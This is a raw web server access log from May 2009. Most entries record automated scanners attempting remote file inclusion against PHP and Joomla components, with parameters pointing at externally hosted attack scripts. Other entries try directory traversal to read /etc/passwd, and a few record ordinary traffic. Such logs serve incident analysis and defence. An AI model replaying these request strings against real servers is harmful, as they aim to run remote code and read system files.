110.45.144.106 - - [17/May/2009:00:25:21 -0400] "GET /logs/access_log.Q109051000%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
83.3.66.60 - - [17/May/2009:00:25:42 -0400] "GET /logs/access_log.Q108090400/xmlrpc.php? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
83.3.66.60 - - [17/May/2009:00:25:43 -0400] "GET /xmlrpc.php? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
83.3.66.60 - - [17/May/2009:00:25:43 -0400] "GET /logs/xmlrpc.php? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
72.32.210.206 - - [17/May/2009:00:26:02 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
72.32.210.206 - - [17/May/2009:00:26:02 -0400] "GET /logs/access_log.Q108100900%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
72.32.210.206 - - [17/May/2009:00:26:02 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 200 1692 "-" "Mozilla/5.0"
72.32.210.206 - - [17/May/2009:00:26:07 -0400] "GET /logs/access_log.Q108082900%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
203.114.112.155 - - [17/May/2009:00:26:37 -0400] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
203.114.112.155 - - [17/May/2009:00:26:37 -0400] "GET /logs/access_log.Q109022600//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
203.114.112.155 - - [17/May/2009:00:26:39 -0400] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
209.59.12.99 - - [17/May/2009:00:26:41 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.114.112.155 - - [17/May/2009:00:26:47 -0400] "GET /logs/access_log.Q109050900//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
72.3.226.56 - - [17/May/2009:00:27:29 -0400] "GET /logs/access_log.Q108110900///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
72.3.226.56 - - [17/May/2009:00:27:29 -0400] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
72.3.226.56 - - [17/May/2009:00:27:29 -0400] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
72.3.226.56 - - [17/May/2009:00:27:29 -0400] "GET /logs/access_log.Q108070500///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
66.232.102.70 - - [17/May/2009:00:27:51 -0400] "GET /logs/access_log.Q109020100//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.813"
66.232.102.70 - - [17/May/2009:00:27:51 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.813"
66.232.102.70 - - [17/May/2009:00:27:51 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.813"
66.232.102.70 - - [17/May/2009:00:28:10 -0400] "GET /logs/access_log.Q109013100//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.813"
72.3.226.56 - - [17/May/2009:00:28:16 -0400] "GET /logs/access_log.Q108110900%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
72.3.226.56 - - [17/May/2009:00:28:16 -0400] "GET /logs/access_log.Q108070500%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
122.153.212.195 - - [17/May/2009:00:28:23 -0400] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
122.153.212.195 - - [17/May/2009:00:28:23 -0400] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
122.153.212.195 - - [17/May/2009:00:28:23 -0400] "GET /logs/access_log.Q109022600//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
122.153.212.195 - - [17/May/2009:00:28:40 -0400] "GET /logs/access_log.Q109050900//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
124.0.55.34 - - [17/May/2009:00:28:42 -0400] "GET /logs/access_log.Q108081500//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
124.0.55.34 - - [17/May/2009:00:28:43 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
124.0.55.34 - - [17/May/2009:00:28:43 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 213 "-" "libwww-perl/5.803"
88.191.103.144 - - [17/May/2009:00:30:13 -0400] "GET /logs/access_log.Q108100900//include/admin.lib.inc.php?site_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
209.59.12.99 - - [17/May/2009:00:31:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
110.45.144.106 - - [17/May/2009:00:33:18 -0400] "GET /logs/access_log.Q108100600/components/com_performs/performs.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
124.0.55.34 - - [17/May/2009:00:33:45 -0400] "GET /logs/access_log.Q108081000//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
88.191.103.144 - - [17/May/2009:00:34:02 -0400] "GET //bbs/include/print_category.php?setup[use_category]=1&dir=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
88.191.103.144 - - [17/May/2009:00:34:02 -0400] "GET /logs//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
88.191.103.144 - - [17/May/2009:00:34:02 -0400] "GET /logs/access_log.Q108100900%20%20//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
72.32.210.206 - - [17/May/2009:00:34:08 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
72.32.210.206 - - [17/May/2009:00:34:08 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 200 1692 "-" "Mozilla/5.0"
72.32.210.206 - - [17/May/2009:00:34:08 -0400] "GET /logs/access_log.Q108081300///?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
72.32.210.206 - - [17/May/2009:00:34:15 -0400] "GET /logs/access_log.Q108121200///?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
72.32.210.206 - - [17/May/2009:00:34:17 -0400] "GET /logs/access_log.Q108081300%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
72.32.210.206 - - [17/May/2009:00:34:17 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 200 1692 "-" "Mozilla/5.0"
72.32.210.206 - - [17/May/2009:00:34:17 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
72.32.210.206 - - [17/May/2009:00:34:24 -0400] "GET /logs/access_log.Q108121200%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
77.221.130.2 - - [17/May/2009:00:34:43 -0400] "GET //toolbar.php?dirDepth=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 210 "-" "libwww-perl/5.805"
77.221.130.2 - - [17/May/2009:00:34:43 -0400] "GET /logs/access_log.Q108061500//toolbar.php?dirDepth=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
77.221.130.2 - - [17/May/2009:00:34:47 -0400] "GET /logs//toolbar.php?dirDepth=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 215 "-" "libwww-perl/5.805"
77.221.130.2 - - [17/May/2009:00:34:47 -0400] "GET /logs/access_log.Q108072000//toolbar.php?dirDepth=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
211.241.40.51 - - [17/May/2009:00:35:02 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
211.241.40.51 - - [17/May/2009:00:35:02 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
211.241.40.51 - - [17/May/2009:00:35:02 -0400] "GET /logs/access_log.Q108090400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
72.32.210.206 - - [17/May/2009:00:35:04 -0400] "GET /logs/access_log.Q109031600/skin/zero_vote/error.php?dir=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
72.32.210.206 - - [17/May/2009:00:35:04 -0400] "GET /skin/zero_vote/error.php?dir=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
72.32.210.206 - - [17/May/2009:00:35:05 -0400] "GET /logs/access_log.Q109051000/skin/zero_vote/error.php?dir=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
72.32.210.206 - - [17/May/2009:00:35:05 -0400] "GET /logs/skin/zero_vote/error.php?dir=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
72.32.210.206 - - [17/May/2009:00:35:43 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
72.32.210.206 - - [17/May/2009:00:35:43 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 200 1692 "-" "Mozilla/5.0"
72.32.210.206 - - [17/May/2009:00:35:43 -0400] "GET /logs/access_log.Q108100900///?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
72.32.210.206 - - [17/May/2009:00:36:18 -0400] "GET /logs/access_log.Q108051700///?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
209.59.12.99 - - [17/May/2009:00:36:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
58.227.193.198 - - [17/May/2009:00:37:30 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
58.227.193.198 - - [17/May/2009:00:37:30 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
58.227.193.198 - - [17/May/2009:00:37:30 -0400] "GET /logs/error_log.Q109051100//skin/zero_vote/ask_password.php?dir=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
72.32.210.206 - - [17/May/2009:00:38:15 -0400] "GET /logs/access_log.Q109031600%20%20/skin/zero_vote/error.php?dir=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
72.32.210.206 - - [17/May/2009:00:38:15 -0400] "GET /logs/access_log.Q109051000%20%20/skin/zero_vote/error.php?dir=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
72.3.226.56 - - [17/May/2009:00:38:58 -0400] "GET /logs/access_log.Q108061400///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
222.236.44.32 - - [17/May/2009:00:39:00 -0400] "GET //toolbar.php?dirDepth=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 210 "-" "libwww-perl/5.79"
222.236.44.32 - - [17/May/2009:00:39:00 -0400] "GET /logs//toolbar.php?dirDepth=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 215 "-" "libwww-perl/5.79"
222.236.44.32 - - [17/May/2009:00:39:00 -0400] "GET //toolbar.php?dirDepth=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 210 "-" "libwww-perl/5.79"
222.236.44.32 - - [17/May/2009:00:39:00 -0400] "GET /logs//toolbar.php?dirDepth=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 215 "-" "libwww-perl/5.79"
222.236.44.32 - - [17/May/2009:00:39:01 -0400] "GET /logs/access_log.Q108061500//toolbar.php?dirDepth=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
208.64.202.135 - - [17/May/2009:00:39:03 -0400] "GET /logs/error_log.Q108033000//skin/zero_vote/ask_password.php?dir=http://www.project80s.com/id.gif??? HTTP/1.1" 404 256 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
208.64.202.135 - - [17/May/2009:00:39:03 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.project80s.com/id.gif??? HTTP/1.1" 404 230 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
208.64.202.135 - - [17/May/2009:00:39:03 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.project80s.com/id.gif??? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
78.137.163.133 - - [17/May/2009:00:39:28 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "-"
78.137.163.133 - - [17/May/2009:00:39:28 -0400] "GET /logs/error_log.Q108080800 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
208.64.202.135 - - [17/May/2009:00:40:57 -0400] "GET /logs/error_log.Q108033000//skin/zero_vote/ask_password.php?dir=http://www.project80s.com/id.gif??? HTTP/1.1" 404 256 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
208.64.202.135 - - [17/May/2009:00:40:57 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.project80s.com/id.gif??? HTTP/1.1" 404 230 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
208.64.202.135 - - [17/May/2009:00:40:57 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.project80s.com/id.gif??? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
74.140.233.8 - - [17/May/2009:00:41:30 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-US; rv:1.9.0.10) Gecko/2009042315 Firefox/3.0.10"
74.140.233.8 - - [17/May/2009:00:41:30 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-US; rv:1.9.0.10) Gecko/2009042315 Firefox/3.0.10"
222.236.44.32 - - [17/May/2009:00:41:31 -0400] "GET /logs/error_log.Q109042900//toolbar.php?dirDepth=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
74.140.233.8 - - [17/May/2009:00:41:32 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-US; rv:1.9.0.10) Gecko/2009042315 Firefox/3.0.10"
74.140.233.8 - - [17/May/2009:00:41:32 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-US; rv:1.9.0.10) Gecko/2009042315 Firefox/3.0.10"
91.184.52.3 - - [17/May/2009:00:41:41 -0400] "GET /logs/access_log.Q109031600/skin/zero_vote/error.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?%0D? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
91.184.52.3 - - [17/May/2009:00:41:41 -0400] "GET /logs/skin/zero_vote/error.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?%0D? HTTP/1.1" 404 227 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
209.59.12.99 - - [17/May/2009:00:41:41 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
91.184.52.3 - - [17/May/2009:00:41:41 -0400] "GET /skin/zero_vote/error.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?%0D? HTTP/1.1" 404 222 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
91.184.52.3 - - [17/May/2009:00:41:41 -0400] "GET /logs/access_log.Q109051000/skin/zero_vote/error.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?%0D? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
211.241.40.51 - - [17/May/2009:00:41:42 -0400] "GET /logs/skin/zero_vote/error.php?dir=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
211.241.40.51 - - [17/May/2009:00:41:42 -0400] "GET /logs/access_log.Q109051000/skin/zero_vote/error.php?dir=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
211.241.40.51 - - [17/May/2009:00:41:42 -0400] "GET /logs/access_log.Q109031600/skin/zero_vote/error.php?dir=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
211.241.40.51 - - [17/May/2009:00:41:45 -0400] "GET /skin/zero_vote/error.php?dir=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
74.74.112.68 - - [17/May/2009:00:42:32 -0400] "GET /logs/access_log.Q108090400/xmlrpc.php? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
74.74.112.68 - - [17/May/2009:00:42:32 -0400] "GET /xmlrpc.php? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
74.74.112.68 - - [17/May/2009:00:42:32 -0400] "GET /logs/xmlrpc.php? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
110.45.145.92 - - [17/May/2009:00:43:31 -0400] "GET /logs/access_log.Q109051000/skin/zero_vote/error.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
110.45.145.92 - - [17/May/2009:00:43:31 -0400] "GET /logs/access_log.Q109031600/skin/zero_vote/error.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
110.45.145.92 - - [17/May/2009:00:43:31 -0400] "GET /logs/skin/zero_vote/error.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
110.45.145.92 - - [17/May/2009:00:43:31 -0400] "GET /skin/zero_vote/error.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
122.153.212.195 - - [17/May/2009:00:43:38 -0400] "GET /logs/access_log.Q109022600%20%20//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
122.153.212.195 - - [17/May/2009:00:43:38 -0400] "GET /logs/access_log.Q109050900%20%20//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
91.184.52.3 - - [17/May/2009:00:45:00 -0400] "GET /logs/access_log.Q109031600/skin/zero_vote/error.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?%0D? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
91.184.52.3 - - [17/May/2009:00:45:00 -0400] "GET /logs/skin/zero_vote/error.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?%0D? HTTP/1.1" 404 227 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
91.184.52.3 - - [17/May/2009:00:45:01 -0400] "GET /skin/zero_vote/error.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?%0D? HTTP/1.1" 404 222 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
91.184.52.3 - - [17/May/2009:00:45:01 -0400] "GET /logs/access_log.Q109051000/skin/zero_vote/error.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?%0D? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
58.227.193.198 - - [17/May/2009:00:45:12 -0400] "GET /logs/access_log.Q108100900//include/admin.lib.inc.php?site_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
66.232.102.70 - - [17/May/2009:00:45:20 -0400] "GET /logs/error_log.Q109013100//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.813"
66.232.102.70 - - [17/May/2009:00:45:20 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.813"
66.232.102.70 - - [17/May/2009:00:45:20 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.813"
66.232.102.70 - - [17/May/2009:00:45:20 -0400] "GET /logs/error_log.Q108123100//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.813"
110.45.145.92 - - [17/May/2009:00:45:57 -0400] "GET /logs/access_log.Q109031600/skin/zero_vote/error.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?%0D? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
110.45.145.92 - - [17/May/2009:00:45:57 -0400] "GET /logs/skin/zero_vote/error.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?%0D? HTTP/1.1" 404 227 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
110.45.145.92 - - [17/May/2009:00:45:57 -0400] "GET /skin/zero_vote/error.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?%0D? HTTP/1.1" 404 222 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
110.45.145.92 - - [17/May/2009:00:45:57 -0400] "GET /logs/access_log.Q109051000/skin/zero_vote/error.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?%0D? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
